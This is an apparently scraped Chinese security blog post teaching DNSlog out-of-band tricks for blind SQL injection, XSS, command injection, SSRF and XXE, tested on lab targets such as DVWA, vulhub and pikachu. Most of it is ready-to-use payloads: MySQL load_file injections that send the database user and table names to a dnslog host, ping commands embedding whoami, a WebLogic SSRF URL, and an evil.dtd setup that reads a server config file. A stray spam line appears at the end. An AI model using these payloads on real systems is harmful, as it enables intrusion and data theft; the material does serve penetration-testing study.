<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    花5分鐘就能上手的dnslog盲打小技巧!

    VSole2022-07-24 06:53:43

     1.什么是dnslog

    DNSlog是什么?DNSlog就是存儲在DNS服務器上的域名信息,它記錄著用戶對域名www.baidu.com等的訪問信息,類似日志文件

     2.dnslog通常用在哪個地方

    1.SQL盲注
    2.無回顯的XSS
    3.無回顯的命令執行
    5.無回顯的SSRF
    5.Blind XXE
    

    2.1.SQL盲注

    無論時時間盲注還是布爾盲注,都需要發送大量的數據包去判斷數據,很容易導致被waf封IP,如果條件允許的話,可以使用dnslog進行快速的數據外帶。以Mysql為例,通過dnslog外帶數據需要用到load_file函數,所以一般得是root權限,并且secure_file_priv得為空
    payload:
    select load_file(concat('\\\\',(select hex(user())),'.dnslog\\aa'));
    注意:后面的aa文件存不存在不重要,隨便寫都行,但是必須要寫,因為是load_file函數需要的條件
    
    以dvwa靶場為例(已手動修改:secure_file_priv=”):
    payload:
    1' and (select load_file(concat('//',(select hex(user())),'.xxxx.ceye.io/as')))# //查看當前用戶
    1' and (select load_file(concat('//',(select database()),'.xxxx.ceye.io/as')))#  //查數據庫
    1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.xxxx.ceye.io/as')))#  //查詢當前數據庫第一個表,第二個類推
    

    2.2.無回顯的XSS

    payload:
    .9e5ehg.dnslog.cn>
    

    然后回頭看下dnslog,證明漏洞存在。

    2.3.無回顯的命令注入

    發現疑似命令執行的洞,但是目標站點什么也不顯示,無法確認是不是有漏洞。
    windows:
    ping %USERNAME%.us0r6c.dnslog.cn
    linux:
    ping `whoami`.us0r6c.dnslog.cn 或者 x=`hostname`;ping -c 1 $x.d7jlma.dnslog.cn
    

    下面是windows常用的變量。
    //變量                     類型       描述
    //%ALLUSERSPROFILE%        本地       返回“所有用戶”配置文件的位置。
    //%APPDATA%                本地       返回默認情況下應用程序存儲數據的位置。
    //%CD%                     本地       返回當前目錄字符串。
    //%CMDCMDLINE%             本地       返回用來啟動當前的 Cmd.exe 的準確命令行。
    //%CMDEXTVERSION%          系統       返回當前的“命令處理程序擴展”的版本號。
    //%COMPUTERNAME%           系統       返回計算機的名稱。
    //%COMSPEC%                系統       返回命令行解釋器可執行程序的準確路徑。
    //%DATE%                   系統       返回當前日期。使用與 date /t 命令相同的格式。由 Cmd.exe 生成。有關 date 命令的詳細信息,請參閱 Date。
    //%ERRORLEVEL%             系統       返回上一條命令的錯誤代碼。通常用非零值表示錯誤。
    //%HOMEDRIVE%              系統       返回連接到用戶主目錄的本地工作站驅動器號。基于主目錄值而設置。用戶主目錄是在“本地用戶和組”中指定的。
    //%HOMEPATH%               系統       返回用戶主目錄的完整路徑。基于主目錄值而設置。用戶主目錄是在“本地用戶和組”中指定的。
    //%HOMESHARE%              系統       返回用戶的共享主目錄的網絡路徑。基于主目錄值而設置。用戶主目錄是在“本地用戶和組”中指定的。
    //%LOGONSERVER%            本地       返回驗證當前登錄會話的域控制器的名稱。
    //%NUMBER_OF_PROCESSORS%   系統       指定安裝在計算機上的處理器的數目。
    //%OS%                     系統       返回操作系統名稱。Windows 2000 顯示其操作系統為 Windows_NT。
    //%PATH%                   系統       指定可執行文件的搜索路徑。
    //%PATHEXT%                系統       返回操作系統認為可執行的文件擴展名的列表。
    //%PROCESSOR_ARCHITECTURE% 系統       返回處理器的芯片體系結構。值:x86 或 IA64(基于 Itanium)。
    //%PROCESSOR_IDENTFIER%    系統       返回處理器說明。
    //%PROCESSOR_LEVEL%        系統       返回計算機上安裝的處理器的型號。
    //%PROCESSOR_REVISION%     系統       返回處理器的版本號。
    //%P ROMPT%                 本地       返回當前解釋程序的命令提示符設置。由 Cmd.exe 生成。
    //%RANDOM%                 系統       返回 0 到 32767 之間的任意十進制數字。由 Cmd.exe 生成。
    //%SYSTEMDRIVE%            系統       返回包含 Windows server operating system 根目錄(即系統根目錄)的驅動器。
    //%SYSTEMROOT%             系統       返回 Windows server operating system 根目錄的位置。
    //%TEMP%和%TMP%            系統和用戶  返回對當前登錄用戶可用的應用程序所使用的默認臨時目錄。有些應用程序需要 TEMP,而其他應用程序則需要 TMP。
    //%TIME%                   系統       返回當前時間。使用與time /t命令相同的格式。由Cmd.exe生成。有關time命令的詳細信息,請參閱 Time。
    //%USERDOMAIN%             本地       返回包含用戶帳戶的域的名稱。
    //%USERNAME%               本地       返回當前登錄的用戶的名稱。
    //%USERPROFILE%            本地       返回當前用戶的配置文件的位置。
    //%WINDIR%                 系統       返回操作系統目錄的位置。
    

    2.4.無回顯的SSRF

    這邊用的是vulhub的一個weblogic的ssrf漏洞。
    /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://rsr8pf.dnslog.cn
    然后查看dnslog有記錄,就很有可能存在ssrf漏洞
    

    2.5.Blind XXE

    這邊用的是pikachu靶場,項目地址:https://github.com/zhuifengshaonianhanlu/pikachu
    2.5.1.未修改源碼前,可以看到是有回顯的。
    xml version="1.0" encoding="UTF-8"?>
    ]>
    <value>&xxe;value>
    

    2.5.2.修改源碼,使其變成無回顯。

    xml version="1.0" encoding="UTF-8"?>
    ]>
    <value>&xxe;value>
    
    無回顯,但是可以看到dnslog收到請求,證明xxe漏洞存在。

    文件讀取
    注:這里需要一個VPS,VPS中放入一個DTD的文件,文件dtd內容如下:
    "php://filter/read=convert.base64-encode/resource=file:///C://phpstudy_pro/Extensions/MySQL5.7.26/my.ini">
    ">
    
    然后利用python3開啟http服務。
    python3 -m http.server --bind 0.0.0.0 1333
    

    pyload:
    "1.0" encoding="UTF-8"?>
    "http://192.168.232.131:1333/evil.dtd">
    %dtd;%int;%send;]>
    

    burp suite提交數據后,vps獲得一串base64編碼。

    將base64編碼拿去解碼后就是my.ini的文件內容。

     3.結語

    以上就是斗哥的技巧分享啦!下期再見!

    ssrfselect
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    FastCGI與PHP-FPM FastCGI 快速通用網關接口(Fast Common Gateway Interface/FastCGI)是一種讓交互程序與Web服務器通信的協議。FastCGI是早期通用網關接口(CGI)的增強版本。FastCGI致力于減少網頁服務器與CGI程序之間交互的開銷,從而使[服務器可以同時處理更多的網頁請求。
    利用SSRF滲透內網主機
    2021-12-26 07:39:35
    接下來PHP解析器會解析php.ini文件,初始化執行環境,然后處理請求,再以規定CGI規定的格式返回處理后的結果,退出進程,Web server再把結果返回給瀏覽器。這就是一個完整的動態PHP Web訪問流程。
    ByteCTF-WriteUp
    2021-10-19 06:38:36
    /files../路由發現了目錄穿越,在/var/lib/clickhouse/access/找到.sql文件,可以看到user_01用戶名密碼。
    DNSlog就是存儲在DNS服務器上的域名信息,它記錄著用戶對域名www.baidu.com等的訪問信息,類似日志文件?以Mysql為例,通過dnslog外帶數據需要用到load_file函數,所以一般得是root權限,并且secure_file_priv得為空payload:。1' and # //查看當前用戶。返回用來啟動當前的 Cmd.exe 的準確命令行。通常用非零值表示錯誤。
    0x00 前言好久沒寫真實漏洞挖掘案例了,今天寫一筆。直接發漏洞細節很生硬,大家也學不到什么,只有帶入感情,留下筆者的想法,才能產生共鳴,真正的幫助到別人。四個漏洞描述順序:存儲過程sql注入;
    數據庫注入提權總結
    2022-08-10 15:52:54
    首先,不能直接將該函數注入子查詢中,因為 Oracle 不支持堆疊查詢 。其次,只有數據庫管理員才能使用 DBMS_LOCK 包。在 Oracle PL/SQL 中有一種更好的辦法,可以使用下面的指令以內聯方式注入延遲:dbms_pipe.receive_messageDBMS_PIPE.RECEIVE_MESSAGE() 函數將為從 RDS 管道返回的數據等待 10 秒。
    本篇文章通過 網絡架構層、HTTP協議層、第三方應用層講解了繞過WAF的常見方法一、網絡架構層一般通過域名指向云WAF地址后反向實現代理,找到這些公司的服務器的真實IP即可實現繞過具體方法如下:1、查找相關的二級域名及同一域名注冊者的其他域名解析記錄。ISASP支持類似Unicode%u0027的編碼,還會對不合法的URL編碼進行字符刪除。
    代碼審計,說白了就是白盒測試,審查代碼檢查是否有安全問題,核心就兩點:跟蹤用戶輸入數據+敏感函數參數回溯。
    本文主要講述Dnslog這種攻擊手法在SQL注入中的實戰運用,雖然網上對于Dnslog在SQL注入方面運用的文章也不少。但是很多文章都只是片面的提到了這個攻擊方式,或者只是用某個簡單的payload做了簡單的驗證。然而在實際的運用中,因為環境的差異,利用也不同。本文詳細的記錄了在多種常見數據庫實際運用過程的一些細節,包括POC的編寫和原理,和一些網上沒有公開的利用POC。
    淺談net-ntlm的利用
    2022-12-16 10:38:09
    淺談net-ntlm的利用。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类